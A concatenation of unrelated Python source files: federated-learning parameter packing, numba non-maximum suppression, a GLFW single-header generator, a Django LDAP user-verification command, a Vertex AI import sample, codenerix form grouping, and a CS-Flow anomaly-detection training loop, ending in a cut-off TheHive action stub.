hash_username_hashes = hashlib.sha256(''.join(sorted(self.client_username_hashes)).encode('utf-8')).hexdigest()
hash_token_hashes = hashlib.sha256(''.join(sorted(self.client_token_hashes)).encode('utf-8')).hexdigest()
authentication_parameters[AuthenticationParameter.HASH_PROJECT_ID] = self.project_id_hash
authentication_parameters[AuthenticationParameter.HASH_USERNAME_HASHES] = hash_username_hashes
authentication_parameters[AuthenticationParameter.HASH_TOKEN_HASHES] = hash_token_hashes
# initialize synchronization parameters
sync_parameters = dict()
sync_parameters[SyncParameter.PROJECT_STEP] = self.client_steps[0]
sync_parameters[SyncParameter.COMM_ROUND] = self.client_comm_rounds[0]
sync_parameters[SyncParameter.OPERATION_STATUS] = self.operation_status
monitoring_parameters = dict()
monitoring_parameters[MonitoringParameter.COMPUTATION_TIME] = self.computation_timer.get_total_duration()
monitoring_parameters[MonitoringParameter.NETWORK_SEND_TIME] = self.network_send_timer.get_total_duration()
monitoring_parameters[MonitoringParameter.CLIENT_COMPENSATOR_TRAFFIC] = self.client_compensator_traffic.total_count
# server parameters in json
server_parameters_json = {Parameter.AUTHENTICATION: authentication_parameters,
Parameter.SYNCHRONIZATION: sync_parameters,
Parameter.MONITORING: monitoring_parameters,
Parameter.COMPENSATION: self.aggregated_compensation_parameters
}
server_parameters_serialized = pickle.dumps(server_parameters_json)
self.computation_timer.stop()
return server_parameters_serialized
except Exception as prepare_exp:
logger.error(f'Project {self.project_id_hash}: Preparing server parameters was failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {prepare_exp}')
self.computation_timer.stop()
self.set_operation_status_failed()
|
import math
from pathlib import Path
import numba
import numpy as np
from spconv.spconv_utils import (
non_max_suppression_cpu, rotate_non_max_suppression_cpu)
from second.core import box_np_ops
from second.core.non_max_suppression.nms_gpu import rotate_iou_gpu
def nms_cc(dets, thresh):
scores = dets[:, 4]
order = scores.argsort()[::-1].astype(np.int32) # highest->lowest
return non_max_suppression_cpu(dets, order, thresh, 1.0)
def rotate_nms_cc(dets, thresh):
scores = dets[:, 5]
order = scores.argsort()[::-1].astype(np.int32) # highest->lowest
dets_corners = box_np_ops.center_to_corner_box2d(dets[:, :2], dets[:, 2:4],
dets[:, 4])
dets_standup = box_np_ops.corner_to_standup_nd(dets_corners)
standup_iou = box_np_ops.iou_jit(dets_standup, dets_standup, eps=0.0)
# print(dets_corners.shape, order.shape, standup_iou.shape)
return rotate_non_max_suppression_cpu(dets_corners, order, standup_iou,
thresh)
@numba.jit(nopython=True)
def nms_jit(dets, thresh, eps=0.0):
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + eps) * (y2 - y1 + eps)
order = scores.argsort()[::-1].astype(np.int32) # highest->lowest
ndets = dets.shape[0]
suppressed = np.zeros((ndets), dtype=np.int32)
keep = []
for _i in range(ndets):
i = order[_i] # start with highest score box
if suppressed[
i] == 1: # if any box have enough iou with this, remove it
continue
keep.append(i)
for _j in range(_i + 1, ndets):
j = order[_j]
if suppressed[j] == 1:
continue
# calculate iou between i and j box
w = max(min(x2[i], x2[j]) - max(x1[i], x1[j]) + eps, 0.0)
h = max(min(y2[i], y2[j]) - max(y1[i], y1[j]) + eps, 0.0)
inter = w * h
ovr = inter / (areas[i] + areas[j] - inter)
# ovr = inter / areas[j]
if ovr >= thresh:
suppressed[j] = 1
return keep
@numba.jit('float32[:, :], float32, float32, float32, uint32', nopython=True)
def soft_nms_jit(boxes, sigma=0.5, Nt=0.3, threshold=0.001, method=0):
N = boxes.shape[0]
pos = 0
maxscore = 0
maxpos = 0
for i in range(N):
maxscore = boxes[i, 4]
maxpos = i
tx1 = boxes[i, 0]
ty1 = boxes[i, 1]
tx2 = boxes[i, 2]
ty2 = boxes[i, 3]
ts = boxes[i, 4]
pos = i + 1
# get max box
while pos < N:
if maxscore < boxes[pos, 4]:
maxscore = boxes[pos, 4]
maxpos = pos
pos = pos + 1
# add max box as a detection
boxes[i, 0] = boxes[maxpos, 0]
boxes[i, 1] = boxes[maxpos, 1]
boxes[i, 2] = boxes[maxpos, 2]
boxes[i, 3] = boxes[maxpos, 3]
boxes[i, 4] = boxes[maxpos, 4]
# swap ith box with position of max box
boxes[maxpos, 0] = tx1
boxes[maxpos, 1] = ty1
boxes[maxpos, 2] = tx2
boxes[maxpos, 3] = ty2
boxes[maxpos, 4] = ts
tx1 = boxes[i, 0]
ty1 = boxes[i, 1]
tx2 = boxes[i, 2]
ty2 = boxes[i, 3]
ts = boxes[i, 4]
pos = i + 1
# NMS iterations, note that N changes if detection boxes fall below threshold
while pos < N:
x1 = boxes[pos, 0]
y1 = boxes[pos, 1]
x2 = boxes[pos, 2]
y2 = boxes[pos, 3]
s = boxes[pos, 4]
area = (x2 - x1 + 1) * (y2 - y1 + 1)
iw = (min(tx2, x2) - max(tx1, x1) + 1)
if iw > 0:
ih = (min(ty2, y2) - max(ty1, y1) + 1)
if ih > 0:
ua = float((tx2 - tx1 + 1) * (ty2 - ty1 + 1) + area -
iw * ih)
ov = iw * ih / ua #iou between max box and detection box
if method == 1: # linear
if ov > Nt:
weight = 1 - ov
else:
weight = 1
elif method == 2: # gaussian
weight = np.exp(-(ov * ov) / sigma)
else: # original NMS
if ov > Nt:
weight = 0
else:
weight = 1
boxes[pos, 4] = weight * boxes[pos, 4]
# if box score falls below threshold, discard the box by swapping with last box
# update N
if boxes[pos, 4] < threshold:
boxes[pos, 0] = boxes[N - 1, 0]
boxes[pos, 1] = boxes[N - 1, 1]
boxes[pos, 2] = boxes[N - 1, 2]
boxes[pos, 3] = boxes[N - 1, 3]
boxes[pos, 4] = boxes[N - 1, 4]
N = N - 1
pos = pos - 1
pos = pos + 1
keep = [i for i in range(N)]
return keep
|
import os
win32_defines = ["#define _GLFW_WIN32 1",
"#ifdef _MSC_VER\n#define _CRT_SECURE_NO_WARNINGS\n#endif",
"#define LSH_GLFW_USE_HYBRID_HPG",
"#ifdef LSH_GLFW_USE_HYBRID_HPG\n#define _GLFW_USE_HYBRID_HPG 1\n#endif",
"#define _UNICODE",
"#ifdef MINGW\n#define UNICODE\n#define WINVER 0x0501\n#endif", ]
win32_headers = [ "internal.h", "mappings.h", "win32_platform.h", "win32_joystick.h", "wgl_context.h", "egl_context.h", "osmesa_context.h", ]
win32_sources = [ "win32_init.c", "win32_joystick.c", "win32_monitor.c", "win32_time.c", "win32_thread.c", "win32_window.c", "wgl_context.c", "egl_context.c", "osmesa_context.c", ]
osmesa_headers = [ "internal.h", "mappings.h","null_platform.h", "null_joystick.h", "posix_time.h", "posix_thread.h", "osmesa_context.h", ]
osmesa_sources = [ "null_init.c", "null_monitor.c", "null_window.c", "null_joystick.c", "posix_time.c", "posix_thread.c", "osmesa_context.c", ]
x11_headers = [ "internal.h", "mappings.h", "x11_platform.h", "xkb_unicode.h", "posix_time.h", "posix_thread.h", "glx_context.h", "egl_context.h", "osmesa_context.h", "linux_joystick.h", ]
x11_sources = [ "x11_init.c", "x11_monitor.c", "x11_window.c", "xkb_unicode.c", "posix_time.c", "posix_thread.c", "glx_context.c", "egl_context.c", "osmesa_context.c", "linux_joystick.c", ]
wayland_headers = [ "internal.h", "mappings.h", "wl_platform.h", "posix_time.h", "posix_thread.h", "xkb_unicode.h", "egl_context.h", "osmesa_context.h", "linux_joystick.h", ]
wayland_sources = [ "wl_init.c", "wl_monitor.c", "wl_window.c", "posix_time.c", "posix_thread.c", "xkb_unicode.c", "egl_context.c", "osmesa_context.c", "linux_joystick.c", ]
cocoa_headers = [ "internal.h", "mappings.h", "cocoa_platform.h", "cocoa_joystick.h", "posix_thread.h", "nsgl_context.h", "egl_context.h", "osmesa_context.h", ]
cocoa_sources = [ "cocoa_init.m", "cocoa_joystick.m", "cocoa_monitor.m", "cocoa_window.m", "cocoa_time.c", "posix_thread.c", "nsgl_context.m", "egl_context.c", "osmesa_context.c", ]
all_headers = list(set(win32_headers + osmesa_headers + x11_headers + wayland_headers + cocoa_headers))
shared_sources = [ "context.c", "init.c", "input.c", "monitor.c", "vulkan.c", "window.c", ]
# Get the file using this function since it might be cached
files_cache = {}
def lsh_get_file(it: str) -> str:
global files_cache
if it in files_cache.keys():
return files_cache[it]
guard = f"HEADER_GUARD_{it.replace('.', '_').upper()}"
code = open(f"./glfw/src/{it}").read()
files_cache[it] = f"\n#ifndef {guard}\n#define {guard}\n{code}\n#endif\n"
return files_cache[it]
# Include the headers into a source
def include_headers(headers, source: str) -> str:
if len(headers) == 0:
return source
for it in headers:
if source.find(f"#include \"{it}\"") != -1:
h = include_headers([i for i in headers if i != it], lsh_get_file(it))
source = source.replace(f"#include \"{it}\"", f"\n{h}\n")
return source
# Add shared code
shared_source_result = ""
for it in shared_sources:
shared_source_result += include_headers(all_headers, lsh_get_file(it))
# Add win32 code
win32_source_result = "\n#if defined _WIN32 || defined LSH_GLFW_WIN32\n"
for it in win32_defines:
win32_source_result += "\n" + it + "\n"
for it in win32_sources:
win32_source_result += include_headers(all_headers, lsh_get_file(it))
win32_source_result += "\n#endif\n"
# Add osmesa code
osmesa_source_result = "\n#ifdef LSH_GLFW_OSMESA\n"
for it in osmesa_sources:
osmesa_source_result += include_headers(all_headers, lsh_get_file(it))
osmesa_source_result += "\n#endif\n"
# Add x11 code
x11_source_result = "\n#ifdef LSH_GLFW_X11\n"
for it in x11_sources:
x11_source_result += include_headers(all_headers, lsh_get_file(it))
x11_source_result += "\n#endif\n"
# Add wayland code
wayland_source_result = "\n#ifdef LSH_GLFW_WAYLAND\n"
for it in wayland_sources:
wayland_source_result += include_headers(all_headers, lsh_get_file(it))
wayland_source_result += "\n#endif\n"
# Add cocoa code
cocoa_source_result = "\n#if defined LSH_GLFW_COCOA || defined __APPLE__\n"
for it in cocoa_sources:
cocoa_source_result += include_headers(all_headers, lsh_get_file(it))
cocoa_source_result += "\n#endif\n"
# Get the glfw headers
headers_result = open("./glfw/include/GLFW/glfw3.h").read() + "\n" + open("./glfw/include/GLFW/glfw3native.h").read() + "\n"
# Add single header
source_result = "\n#ifdef LSH_GLFW_IMPLEMENTATION\n"
source_result += win32_source_result + osmesa_source_result + x11_source_result + wayland_source_result + cocoa_source_result + shared_source_result
source_result += "\n#endif\n"
# Comment out options macro error
source_result = source_result.replace("#error \"You must not define any header option macros when compiling GLFW\"",
"//#error \"You must not define any header option macros when compiling GLFW\"")
# for it in win32_headers + osmesa_headers + x11_headers + wayland_headers + cocoa_headers:
# source_result = source_result.replace(f"#include \"{it}\"", f"//#include \"{it}\"")
source_result = source_result.replace("#include \"../include/GLFW/glfw3.h\"", "//#include \"../include/GLFW/glfw3.h\"")
# Make dirs
if not os.path.exists("./generated-single-header"):
os.makedirs("./generated-single-header")
if not os.path.exists("./generated-single-header-and-source"):
os.makedirs("./generated-single-header-and-source")
# Make single header
open("./generated-single-header/glfw.h", "w+").write(headers_result + source_result)
# Make single header + single source
open("./generated-single-header-and-source/glfw.h", "w+").write(headers_result)
open("./generated-single-header-and-source/glfw.c", "w+").write(
headers_result + "\n#define LSH_GLFW_IMPLEMENTATION\n" + source_result)
|
import ldap3
from allauth.socialaccount.models import SocialAccount
from django.conf import settings
from base.management import BaseCommand
def init_ldap():
server = ldap3.Server("ldap://ads.mwn.de")
connection = ldap3.Connection(
server,
"CN=%s,OU=Users,ou=TU,ou=IAM,dc=ads,dc=mwn,dc=de" % settings.LDAP_USER,
settings.LDAP_PASSWORD,
)
return connection
def check_user_in_ldap(connection, uid):
return connection.search(
"ou=Users,ou=TU,ou=IAM,dc=ads,dc=mwn,dc=de", "(uid=%s)" % uid
)
class Command(BaseCommand):
help = "Verify state of users in Active Directory. Deactivate old users."
def add_arguments(self, parser):
parser.add_argument(
"--delete",
action="store_true",
dest="delete",
default=False,
help="Whether to delete instead of deactivate old users.",
)
def handle(self, *args, **options):
if not (
hasattr(settings, "LDAP_USER")
and hasattr(settings, "LDAP_PASSWORD")
):
self.stdout.write(
"Please set LDAP_USER and LDAP_PASSWORD in configuration.py."
)
return
connection = init_ldap()
connection.bind()
activate_count = 0
delete_count = 0
deactivate_count = 0
for sa in SocialAccount.objects.all():
if check_user_in_ldap(connection, sa.uid):
if not sa.user.is_active:
sa.user.is_active = True
sa.user.save()
activate_count += 1
elif options["delete"]:
sa.user.delete()
delete_count += 1
elif sa.user.is_active:
sa.user.is_active = False
sa.user.save()
deactivate_count += 1
connection.unbind()
self.stdout.write(
"Activated: %s, Deactivated: %s, Deleted: %s, Verified: %s"
% (
activate_count,
deactivate_count,
delete_count,
len(SocialAccount.objects.all()),
)
)
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START aiplatform_import_data_sample]
from google.cloud import aiplatform
def import_data_sample(
project: str,
dataset_id: str,
gcs_source_uri: str,
import_schema_uri: str,
location: str = "us-central1",
api_endpoint: str = "us-central1-aiplatform.googleapis.com",
timeout: int = 1800,
):
client_options = {"api_endpoint": api_endpoint}
# Initialize client that will be used to create and send requests.
# This client only needs to be created once, and can be reused for multiple requests.
client = aiplatform.gapic.DatasetServiceClient(client_options=client_options)
# Here we use only one import config with one source
import_configs = [
{
"gcs_source": {"uris": [gcs_source_uri]},
"import_schema_uri": import_schema_uri,
}
]
name = client.dataset_path(project=project, location=location, dataset=dataset_id)
response = client.import_data(name=name, import_configs=import_configs)
print("Long running operation:", response.operation.name)
import_data_response = response.result(timeout=timeout)
print("import_data_response:", import_data_response)
# [END aiplatform_import_data_sample]
|
# -*- coding: utf-8 -*-
#
# django-codenerix
#
# Codenerix GNU
#
# Project URL : http://www.codenerix.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from codenerix.djng.angular_model import NgModelFormMixin
from codenerix.djng import NgFormValidationMixin, NgForm, NgModelForm
from django.utils.translation import gettext as _
from django.forms.widgets import Select, CheckboxInput
from django.forms import NullBooleanField
from codenerix.helpers import model_inspect
from codenerix.widgets import (
StaticSelect,
DynamicSelect,
DynamicInput,
MultiStaticSelect,
MultiDynamicSelect,
)
class BaseForm(object):
def __init__(self, *args, **kwargs):
self.__language = None
self.attributes = {}
return super(BaseForm, self).__init__(*args, **kwargs)
def set_language(self, language):
self.__language = language
def set_attribute(self, key, value):
self.attributes[key] = value
def get_name(self):
# If name atrribute exists in Meta
if "name" in self.Meta.__dict__:
# Try to get name from Meta
name = self.Meta.name
else:
# If not try to find it automatically
info = model_inspect(self.Meta.model())
if info["verbose_name"]:
name = info["verbose_name"]
else:
name = info["modelname"]
return name
def __errors__(self):
return []
def clean_color(self):
color = self.cleaned_data["color"]
if len(color) != 0:
valores_validos = "#0123456789abcdefABCDEF"
r = True
for lt in color:
if lt not in valores_validos:
r = False
break
if not r or color[0] != "#" or not (len(color) == 4 or len(color) == 7):
self._errors["color"] = [_("Invalid color")]
return color
else:
return color
else:
return color
def get_errors(self):
# Where to look for fields
if "list_errors" in dir(self):
list_errors = self.list_errors
else:
# r = self.non_field_errors()
# list_errors = [element[5] for element in list(self.non_field_errors())[:-1]]
list_errors = []
for element in list(self.non_field_errors())[:-1]:
if len(element) >= 5:
list_errors.append(element[5])
return list_errors
def __groups__(self):
return []
def get_groups(self, gs=None, processed=[], initial=True):
"""
<--------------------------------------- 12 columns ------------------------------------>
<--- 6 columns ---> <--- 6 columns --->
------------------------------------------ ------------------------------------------
| Info | | Personal |
|==========================================| |==========================================|
| ----------------- ------------------ | | |
| | Passport | | Name | | | Phone Zipcode |
| |=================| | [.....] [.....] | | | [...........................] [.......] |
| | CID Country | | <- 6 -> <- 6 -> | | | <--- 8 columns ---> <-4 col-> |
| | [.....] [.....] | | | | | |
| | <- 6 -> <- 6 -> | ----------------- | | Address |
| ----------------- | | [.....................................] |
------------------------------------------ | <--- 12 columns ---> |
| [..] number |
| <--- 12 columns ---> |
| |
------------------------------------------
group = [
(_('Info'),(6,'#8a6d3b','#fcf8e3','center'),
(_('Identification'),6,
["cid",6],
["country",6],
),
(None,6,
["name",None,6],
["surname",None,6,False],
),
),
(_('Personal'),6,
["phone",None,8],
["zipcode",None,4],
["address",None,12],
["number",None,12, True],
),
]
Group: it is defined as tuple with 3 or more elements:
Grammar: (<Name>, <Attributes>, <Element1>, <Element2>, ..., <ElementN>)
If <Name> is None: no name will be given to the group and no panel decoration will be shown
If <Size in columns> is None: default of 6 will be used
<Attributes>:
it can be an integer that represent the size in columns
it can be a tuple with several attributes where each element represents:
(<Size in columns>,'#<Font color>','#<Background color>','<Alignment>')
<Element>:
it can be a Group
it can be a Field
Examples:
('Info', 6, ["name",6], ["surname",6]) -> Info panel using 6 columns with 2 boxes 6 columns for each with name and surname inputs
('Info', (6,None,'#fcf8e3','center'), ["name",6], ["surname",6]) -> Info panel using 6 columns with a yellow brackground in centered title, 2 boxes, 6 columns for each with name and surname inputs
('Info', 12, ('Name', 6, ["name",12]), ('Surname',6, ["surname",12])) -> Info panel using 12 columns with 2 panels inside
of 6 columns each named "Name" and "Surname" and inside each of them an input "name" and "surname" where it belongs.
Field: must be a list with at least 1 element in it:
Grammar: [<Name of field>, <Size in columns>, <Label>]
<Name of field>:
This must be filled always
It is the input's name inside the form
Must exists as a form element or as a grouped form element
<Size in columns>:
Size of the input in columns
If it is not defined or if it is defined as None: default of 6 will be used
<Label>:
It it is defined as False: the label for this field will not be shown
If it is not defined or if it is defined as None: default of True will be used (default input's label will be shown)
If it is a string: this string will be shown as a label
Examples:
['age'] Input 'age' will be shown with 6 columns and its default label
['age',8] Input 'age' will be shown with 8 columns and its default label
['age', None, False] Input 'age' will be shown with 6 columns and NO LABEL
['age',8,False] Input 'age' will be shown with 8 columns and NO LABEL
['age',8,_("Age in days")] Input 'age' will be shown with 8 columns and translated label text "Age in days" to user's language
['age',8,_("Age in days"), True] Input 'age' will be shown with 8 columns and translated label text "Age in days" to user's language, and input inline with label
['age',6, None, None, None, None, None, ["ng-click=functionjs('param1')", "ng-change=functionjs2()"]] Input 'age' with extras functions
['age',None,None,None,None, 'filter'] Input 'age' with extras filter ONLY DETAILS
['age',6, {'color': 'red'} Input 'age' will be shown with red title
"""
# Check if language is set
if not self.__language:
raise IOError("ERROR: No language suplied!")
# Initialize the list
if initial:
processed = []
# Where to look for fields
if "list_fields" in dir(self):
list_fields = self.list_fields
check_system = "html_name"
else:
list_fields = self
check_system = "name"
# Default attributes for fields
attributes = [
("columns", 6),
("color", None),
("bgcolor", None),
("textalign", None),
("inline", False), # input in line with label
("label", True),
("extra", None),
("extra_div", None),
("foreign_info", {}),
]
labels = [x[0] for x in attributes]
# Get groups if none was given
if gs is None:
gs = self.__groups__()
# Prepare the answer
groups = []
# Prepare focus control
focus_first = None
focus_must = None
# html helper for groups and fields
html_helper = self.html_helper()
# Start processing
for g in gs:
token = {}
token["name"] = g[0]
if token["name"] in html_helper:
if "pre" in html_helper[token["name"]]:
token["html_helper_pre"] = html_helper[token["name"]]["pre"]
if "post" in html_helper[token["name"]]:
token["html_helper_post"] = html_helper[token["name"]]["post"]
styles = g[1]
if type(styles) is tuple:
if len(styles) >= 1:
token["columns"] = g[1][0]
if len(styles) >= 2:
token["color"] = g[1][1]
if len(styles) >= 3:
token["bgcolor"] = g[1][2]
if len(styles) >= 4:
token["textalign"] = g[1][3]
if len(styles) >= 5:
token["inline"] = g[1][4]
if len(styles) >= 7:
token["extra"] = g[1][5]
if len(styles) >= 8:
token["extra_div"] = g[1][6]
else:
token["columns"] = g[1]
fs = g[2:]
fields = []
for f in fs:
# Field
atr = {}
# Decide weather this is a Group or not
if type(f) == tuple:
# Recursive
fields += self.get_groups([list(f)], processed, False)
else:
try:
list_type = [
str,
unicode,
]
except NameError:
list_type = [
str,
]
# Check if it is a list
if type(f) == list:
# This is a field with attributes, get the name
field = f[0]
if (
html_helper
and token["name"] in html_helper
and "items" in html_helper[token["name"]]
and field in html_helper[token["name"]]["items"]
):
if "pre" in html_helper[token["name"]]["items"][field]:
atr["html_helper_pre"] = html_helper[token["name"]][
"items"
][field]["pre"]
if "post" in html_helper[token["name"]]["items"][field]:
atr["html_helper_post"] = html_helper[token["name"]][
"items"
][field]["post"]
# Process each attribute (if any)
dictionary = False
for idx, element in enumerate(f[1:]):
if type(element) == dict:
dictionary = True
for key in element.keys():
if key in labels:
atr[key] = element[key]
else:
raise IOError(
"Unknown attribute '{0}' as field '{1}' in list of fields".format(
key, field
)
)
else:
if not dictionary:
if element is not None:
atr[attributes[idx][0]] = element
else:
raise IOError(
"We already processed a dicionary element in this list of fields, you can not add anoother type of elements to it, you must keep going with dictionaries"
)
elif type(f) in list_type:
field = f
else:
raise IOError(
"Uknown element type '{0}' inside group '{1}'".format(
type(f), token["name"]
)
)
# Get the Django Field object
found = None
foundbool = False
for infield in list_fields:
if infield.__dict__[check_system] == field:
found = infield
foundbool = True
break
if foundbool:
# Get attributes (required and original attributes)
wrequired = found.field.widget.is_required
wattrs = found.field.widget.attrs
# Fill base attributes
atr["name"] = found.html_name
atr["input"] = found
atr["inputbool"] = foundbool
atr["focus"] = False
# Set focus
if focus_must is None:
if focus_first is None:
focus_first = atr
if wrequired:
focus_must = atr
# Autocomplete
if "autofill" in dir(self.Meta):
autofill = self.Meta.autofill.get(found.html_name, None)
atr["autofill"] = autofill
if autofill:
# Check format of the request
autokind = autofill[0]
if type(autokind) == str:
# Using new format
if autokind == "select":
# If autofill is True for this field set the DynamicSelect widget
found.field.widget = DynamicSelect(wattrs)
elif autokind == "multiselect":
# If autofill is True for this field set the DynamicSelect widget
found.field.widget = MultiDynamicSelect(wattrs)
elif autokind == "input":
# If autofill is True for this field set the DynamicSelect widget
found.field.widget = DynamicInput(wattrs)
else:
raise IOError(
"Autofill filled using new format but autokind is '{}' and I only know 'input' or 'select'".format(
autokind
)
)
# Configure the field
found.field.widget.is_required = wrequired
found.field.widget.form_name = self.form_name
found.field.widget.field_name = infield.html_name
found.field.widget.autofill_deepness = autofill[1]
found.field.widget.autofill_url = autofill[2]
found.field.widget.autofill = autofill[3:]
else:
# Get old information [COMPATIBILITY WITH OLD VERSION]
# If autofill is True for this field set the DynamicSelect widget
found.field.widget = DynamicSelect(wattrs)
found.field.widget.is_required = wrequired
found.field.widget.form_name = self.form_name
found.field.widget.field_name = infield.html_name
found.field.widget.autofill_deepness = autofill[0]
found.field.widget.autofill_url = autofill[1]
found.field.widget.autofill = autofill[2:]
else:
# Set we don't have autofill for this field
atr["autofill"] = None
# Check if we have to replace the widget with a newer one
if isinstance(found.field.widget, Select) and not isinstance(
found.field.widget, DynamicSelect
):
if not isinstance(
found.field.widget, MultiStaticSelect
) and not isinstance(
found.field.widget, MultiDynamicSelect
):
found.field.widget = StaticSelect(wattrs)
found.field.widget.choices = found.field.choices
found.field.widget.is_required = wrequired
found.field.widget.form_name = self.form_name
found.field.widget.field_name = infield.html_name
# Fill all attributes
for (attribute, default) in attributes:
if attribute not in atr.keys():
atr[attribute] = default
# Fill label
if atr["label"] is True:
atr["label"] = found.label
# Set language
flang = getattr(found.field, "set_language", None)
if flang:
flang(self.__language)
flang = getattr(found.field.widget, "set_language", None)
if flang:
flang(self.__language)
# Attach the element
fields.append(atr)
# Remember we have processed it
processed.append(found.__dict__[check_system])
else:
raise IOError(
"Unknown field '{0}' specified in group '{1}'".format(
f, token["name"]
)
)
token["fields"] = fields
groups.append(token)
# Add the rest of attributes we didn't use yet
if initial:
fields = []
for infield in list_fields:
if infield.__dict__[check_system] not in processed:
# Get attributes (required and original attributes)
wattrs = infield.field.widget.attrs
wrequired = infield.field.widget.is_required
# Prepare attr
atr = {}
# Fill base attributes
atr["name"] = infield.html_name
atr["input"] = infield
atr["inputbool"] = True
atr["focus"] = False
# Set focus
if focus_must is None:
if focus_first is None:
focus_first = atr
if wrequired:
focus_must = atr
# Autocomplete
if "autofill" in dir(self.Meta):
autofill = self.Meta.autofill.get(infield.html_name, None)
atr["autofill"] = autofill
if autofill:
# Check format of the request
autokind = autofill[0]
if type(autokind) == str:
# Get old information
# Using new format
if autokind == "select":
# If autofill is True for this field set the DynamicSelect widget
infield.field.widget = DynamicSelect(wattrs)
elif autokind == "multiselect":
# If autofill is True for this field set the DynamicSelect widget
infield.field.widget = MultiDynamicSelect(wattrs)
elif autokind == "input":
# If autofill is True for this field set the DynamicSelect widget
infield.field.widget = DynamicInput(wattrs)
else:
raise IOError(
"Autofill filled using new format but autokind is '{}' and I only know 'input' or 'select'".format(
autokind
)
)
# Configure the field
infield.field.widget.is_required = wrequired
infield.field.widget.form_name = self.form_name
infield.field.widget.field_name = infield.html_name
infield.field.widget.autofill_deepness = autofill[1]
infield.field.widget.autofill_url = autofill[2]
infield.field.widget.autofill = autofill[3:]
else:
# Get old information [COMPATIBILITY WITH OLD VERSION]
# If autofill is True for this field set the DynamicSelect widget
infield.field.widget = DynamicSelect(wattrs)
infield.field.widget.is_required = wrequired
infield.field.widget.form_name = self.form_name
infield.field.widget.field_name = infield.html_name
infield.field.widget.autofill_deepness = autofill[0]
infield.field.widget.autofill_url = autofill[1]
infield.field.widget.autofill = autofill[2:]
else:
# Set we don't have autofill for this field
atr["autofill"] = None
# Check if we have to replace the widget with a newer one
if isinstance(infield.field.widget, Select) and not isinstance(
infield.field.widget, DynamicSelect
):
if isinstance(infield.field, NullBooleanField):
infield.field.widget = CheckboxInput(wattrs)
elif not isinstance(
infield.field.widget, MultiStaticSelect
) and not isinstance(infield.field.widget, MultiDynamicSelect):
infield.field.widget = StaticSelect(wattrs)
if hasattr(infield.field.widget, "choices") and hasattr(
infield.field, "choices"
):
infield.field.widget.choices = infield.field.choices
infield.field.widget.is_required = wrequired
infield.field.widget.form_name = self.form_name
infield.field.widget.field_name = infield.html_name
# Fill all attributes
for (attribute, default) in attributes:
if attribute not in atr.keys():
atr[attribute] = default
# Fill label
if atr["label"] is True:
atr["label"] = infield.label
# Set language
flang = getattr(infield.field, "set_language", None)
if flang:
flang(self.__language)
flang = getattr(infield.field.widget, "set_language", None)
if flang:
flang(self.__language)
# Attach the attribute
fields.append(atr)
# Save the new elements
if fields:
groups.append({"name": None, "columns": 12, "fields": fields})
# Set focus
if focus_must:
focus_must["focus"] = True
elif focus_first is not None:
focus_first["focus"] = True
# Return the resulting groups
return groups
def html_helper(self):
"""
g={'Group Name':{
'pre': 'text pre div',
'post': 'text post div',
'items': {
'input name':{'pre': 'text pre name', 'post': 'text post name'},
'example':{'pre': '<p>text <b>for</b> help</p>', 'post': '<div>more help</div>'},
}
}
}
"""
return {}
class GenModelForm(BaseForm, NgModelFormMixin, NgFormValidationMixin, NgModelForm):
pass
class GenForm(BaseForm, NgFormValidationMixin, NgForm):
add_djng_error = False
class Meta:
name = ""
|
import numpy as np
import torch
from sklearn.metrics import roc_auc_score
from tqdm import tqdm
import config as c
from model import get_cs_flow_model, save_model, FeatureExtractor, nf_forward
from utils import *
def train(train_loader, test_loader):
model = get_cs_flow_model()
optimizer = torch.optim.Adam(model.parameters(), lr=c.lr_init, eps=1e-04, weight_decay=1e-5)
model.to(c.device)
if not c.pre_extracted:
fe = FeatureExtractor()
fe.eval()
fe.to(c.device)
for param in fe.parameters():
param.requires_grad = False
z_obs = Score_Observer('AUROC')
for epoch in range(c.meta_epochs):
# train some epochs
model.train()
if c.verbose:
print(F'\nTrain epoch {epoch}')
for sub_epoch in range(c.sub_epochs):
train_loss = list()
for i, data in enumerate(tqdm(train_loader, disable=c.hide_tqdm_bar)):
optimizer.zero_grad()
inputs, labels = preprocess_batch(data) # move to device and reshape
if not c.pre_extracted:
inputs = fe(inputs)
z, jac = nf_forward(model, inputs)
loss = get_loss(z, jac)
train_loss.append(t2np(loss))
loss.backward()
norm = torch.nn.utils.clip_grad_norm_(model.parameters(), c.max_grad_norm)
optimizer.step()
mean_train_loss = np.mean(train_loss)
if c.verbose and epoch == 0 and sub_epoch % 4 == 0:
print('Epoch: {:d}.{:d} \t train loss: {:.4f}'.format(epoch, sub_epoch, mean_train_loss))
# evaluate
model.eval()
if c.verbose:
print('\nCompute loss and scores on test set:')
test_loss = list()
test_z = list()
test_labels = list()
with torch.no_grad():
for i, data in enumerate(tqdm(test_loader, disable=c.hide_tqdm_bar)):
inputs, labels = preprocess_batch(data)
if not c.pre_extracted:
inputs = fe(inputs)
z, jac = nf_forward(model, inputs)
loss = get_loss(z, jac)
z_concat = t2np(concat_maps(z))
score = np.mean(z_concat ** 2, axis=(1, 2))
test_z.append(score)
test_loss.append(t2np(loss))
test_labels.append(t2np(labels))
test_loss = np.mean(np.array(test_loss))
if c.verbose:
print('Epoch: {:d} \t test_loss: {:.4f}'.format(epoch, test_loss))
test_labels = np.concatenate(test_labels)
is_anomaly = np.array([0 if l == 0 else 1 for l in test_labels])
anomaly_score = np.concatenate(test_z, axis=0)
z_obs.update(roc_auc_score(is_anomaly, anomaly_score), epoch,
print_score=c.verbose or epoch == c.meta_epochs - 1)
if c.save_model:
model.to('cpu')
save_model(model, c.modelname)
return z_obs.max_score, z_obs.last, z_obs.min_loss_score
|
import random
from thehive4pyextended import TheHiveApiExtended
from thehive4py.query import Eq
from st2common.runners.base_action import Action
__all__ = [
